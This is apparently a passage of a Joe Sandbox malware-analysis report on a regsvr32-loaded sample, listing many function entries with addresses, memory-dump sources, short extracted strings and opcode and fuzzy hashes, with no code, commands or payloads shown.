                                                                                            • Instruction ID: 7ac51709a089332b97f694898c87138605217839b3d47701a2fcca0a2fefd023
                                                                                            • Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                            • Instruction Fuzzy Hash: 3551C2B190074E8FDB44CF68C88A4DE7FB0FB68398F204619F856A6250D3B496A4CFD4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074EAC0 Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: '0$~?$\
                                                                                            • API String ID: 0-629757258
                                                                                            • Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                            • Instruction ID: 84f2d81bda0b252865636818e550008d1eca5e84af041749ca159cd552e989f8
                                                                                            • Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                            • Instruction Fuzzy Hash: F741CEB0548B808BE718CF28C59A51ABBF1FBC5344F604A2DF6968A3A0D774D885CF42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073DCB8 Relevance: 3.8, Strings: 3, Instructions: 80COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: A7$z$~*b
                                                                                            • API String ID: 0-275545515
                                                                                            • Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                            • Instruction ID: 8c617503316829237258fe3884cc044a343a17b4d6b70982d7054a648ba2e3f4
                                                                                            • Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                            • Instruction Fuzzy Hash: D341C4B180074ECFDB48CF64C48A5DE7FB0FB64398F204619E855A6250D3B896A9CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073A7F0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H$rTk=${,%
                                                                                            • API String ID: 0-3174111592
                                                                                            • Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                            • Instruction ID: 098befeb913c2e597e771e1fd630b20a73017df7a5e47bad055fbe828ba1442e
                                                                                            • Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                            • Instruction Fuzzy Hash: 1731E970528785ABD798DF28C4CA91EBBE1FBC4354F906A1CF5C2862A1C779D445CB03
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000000018000B878 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                            • String ID:
                                                                                            • API String ID: 15204871-0
                                                                                            • Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                            • Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
                                                                                            • Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                            • Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180010DB0 Relevance: 3.0, APIs: 2, Instructions: 20nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: LinkObjectOpenSymbolic
                                                                                            • String ID:
                                                                                            • API String ID: 3706036087-0
                                                                                            • Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                            • Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
                                                                                            • Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                            • Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00743FD0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: D?"$8zfK
                                                                                            • API String ID: 0-617590365
                                                                                            • Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                            • Instruction ID: 2228e79c484956accb9c5151e3ebfbff804322fa4625dd7bb206a413294715f6
                                                                                            • Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                            • Instruction Fuzzy Hash: 2C12F2B550560DCBDB68DF38C48A49E3BE1FF58304F205129FC269B2A2D774D964CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073C078 Relevance: 2.9, Strings: 2, Instructions: 384COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #X$h}
                                                                                            • API String ID: 0-3021649463
                                                                                            • Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                            • Instruction ID: 64e35d32618ed556758d7fb4b6d6747306be72dc100f1a9f2967f67973df2116
                                                                                            • Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                            • Instruction Fuzzy Hash: A22296709096888BEBF9DF24C889AD97BF0FF44704F90251ED84EAA650DB7C6645CF42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00759910 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #X$+ <
                                                                                            • API String ID: 0-1007305072
                                                                                            • Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                            • Instruction ID: 76955c5bc4ec5e5675efab1de2e59f961e26cbcd4d0d055ebd4a64a130198000
                                                                                            • Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                            • Instruction Fuzzy Hash: 440278B5900709CFDB88CF68C58A5DD7BB9FB59308F404129FC1E9A2A0D3B4E919CB56
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074B460 Relevance: 2.8, Strings: 2, Instructions: 290COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Hc$aYG
                                                                                            • API String ID: 0-2147329803
                                                                                            • Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                            • Instruction ID: 01fbaf48f275129e93a6e32bf10c0af99fce7d321f3c87ecf35433a8b1b63a7f
                                                                                            • Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                            • Instruction Fuzzy Hash: 90D1117560170DCBDB68CF28C58A59E3BE9FF54308F504129FC1E862A5D7B8E829CB46
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007333D4 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Ip$2/
                                                                                            • API String ID: 0-2558650176
                                                                                            • Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                            • Instruction ID: 34efac784f560ff468e9cac59e7019d94d27884e93f4820627d7cdb6ae297361
                                                                                            • Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                            • Instruction Fuzzy Hash: F8E1C471505B888FEBB8DF24CC99BEB7BA0FB44306F20551AD849DE290DB785685CF41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00734214 Relevance: 2.8, Strings: 2, Instructions: 253COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID: h$j-`
                                                                                            • API String ID: 963392458-2572860821
                                                                                            • Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                            • Instruction ID: ca7ba3d67c873a10d3801fbe2177a2ad1f88d3b2d5ceb278fba2c161527f32ac
                                                                                            • Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                            • Instruction Fuzzy Hash: C2C1E371904788CFDF6CDFA8C88A59DBBB1FB58308F20421DE916AB661DBB49845CF41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00746C70 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #z$UP
                                                                                            • API String ID: 0-3609392360
                                                                                            • Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                            • Instruction ID: c1fb44543fa92a274cc6504c4d568c05777e9b98bd1801879c5314bd0faf0d79
                                                                                            • Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                            • Instruction Fuzzy Hash: 9CA13771904609DBDF58DFA8E4CA49EBBB0FB64344F20451DF846A72A0CB789995CFC2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007594BC Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: )bkr$z~
                                                                                            • API String ID: 0-4035444816
                                                                                            • Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                            • Instruction ID: 9521b67ba0c50b9f928b5e6dc2ed5c0f2243a51fd3ea7106f73ff16657ca37bf
                                                                                            • Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                            • Instruction Fuzzy Hash: 0C817C71514789CFEBB88F28CC8A7D937A0FB45314F608219DD8ECA291DFB85A4D9B41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074EC30 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: aK>$NM
                                                                                            • API String ID: 0-1076587397
                                                                                            • Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                            • Instruction ID: bdc74719ecc616cda6e387f08f908814f8fa6bc420b14134507f307f58b36bba
                                                                                            • Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                            • Instruction Fuzzy Hash: E3B144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A1E3B5E614CB56
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074662C Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: GcX$cy5X
                                                                                            • API String ID: 0-3427037236
                                                                                            • Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                            • Instruction ID: 46a54a7028a90f90ab8c06a4d6a5d6ee546049df270cb43c62a1cf61b3b27170
                                                                                            • Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                            • Instruction Fuzzy Hash: EDA1C7B0548388CBEBBEDF34D89A6D93BA9FB44704F504619E80E8E290DF745745CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073AC94 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: &$U
                                                                                            • API String ID: 0-326847644
                                                                                            • Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                            • Instruction ID: fa7e975f921b9fbf1657bac7617bf385ac792ae4eca269386bdd8ff9fdb8818c
                                                                                            • Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                            • Instruction Fuzzy Hash: 199169B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00745A00 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: k' {$z5
                                                                                            • API String ID: 0-3484172565
                                                                                            • Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                            • Instruction ID: cf276cbed6f1726c8a7aa603958485cee85067b48a1f64949bf0d6d71bf807d3
                                                                                            • Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                            • Instruction Fuzzy Hash: B471F770600749CFDB48DF28C88A5DE7BA1FB58348F114329EC8AAB251D778D954CBC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073AAB8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$D
                                                                                            • API String ID: 0-3309211938
                                                                                            • Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                            • Instruction ID: 2861088462c5be5e35d5194bee842517ee56e006db859bca736c89369c04e7cb
                                                                                            • Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                            • Instruction Fuzzy Hash: 17512D70524789ABDB98CF28DC8A9993BA4FB15304F90626DFD86C7252C778D886CB41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00737530 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #T$(Pv0
                                                                                            • API String ID: 0-2531358951
                                                                                            • Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                            • Instruction ID: 7ac9ba4d3f2d2747e3cbd0d14ae099be98b6cd5d2b6c1b915bf8818493bbe5e3
                                                                                            • Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                            • Instruction Fuzzy Hash: 31512FB050070E8BDF58DF14C88A4DE3BA0FB68398F251619FC4A96295D378D999CFC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00743B14 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$%9
                                                                                            • API String ID: 0-3031553271
                                                                                            • Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                            • Instruction ID: 8da8284ebe2c293df3f9b9f06114f1e2f3c91514f6672c6fe4aa680cd4022333
                                                                                            • Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                            • Instruction Fuzzy Hash: 8D412B7061CB84ABD798DF19C0D962ABAE1FB88714F90592EF48AC7291C738C944CB47
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073B07C Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: gd$s=z
                                                                                            • API String ID: 0-3301279615
                                                                                            • Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                            • Instruction ID: aa5d7c152d57af9d6fdf1790f499a54eb2f6a576db5490730323eef403844c58
                                                                                            • Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                            • Instruction Fuzzy Hash: F251E1B190030A8FDB48CF68D48A5DE7FB1FB68388F204219F856A6250D37886A4CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00736138 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: !oW!$ke&Q
                                                                                            • API String ID: 0-419570616
                                                                                            • Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                            • Instruction ID: 94ae8c63bdf65f358bccd598a44367aab0c634bf02fdad99a01aca2e1709207e
                                                                                            • Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                            • Instruction Fuzzy Hash: 2E51D7B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00734758 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ?j|$P
                                                                                            • API String ID: 0-615948335
                                                                                            • Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                            • Instruction ID: bf3e6e47079eaa0c3886aa4d205772bd04a7bb65d407afea62eee33333146ed0
                                                                                            • Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                            • Instruction Fuzzy Hash: 7E41D3B090034A8FDB48CF64C48A5DE7FB1FB68388F50461DE816A6390D77896A4CFD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00745880 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: %$aI
                                                                                            • API String ID: 0-3604358270
                                                                                            • Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                            • Instruction ID: 3f20e1a47833844578fbc524b0c5a2be334a7a5aad641c41bb80460401ca91be
                                                                                            • Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                            • Instruction Fuzzy Hash: 0241D6B090038ACBCB48CF64C99A5DE7BB1FB48358F114A2DF82697350D3B49664CF80
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00748A2C Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: j$[
                                                                                            • API String ID: 0-3696242357
                                                                                            • Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                            • Instruction ID: 2b3c419e1e7376abbec55d31f3f0e59bb8af4c64e499347c8606597baa97e938
                                                                                            • Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                            • Instruction Fuzzy Hash: 5E41D5B090074E8BDB48DF64C48A5DE7FB1FB58398F11861DE856A6290D3B4D6A4CFC1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074C058 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
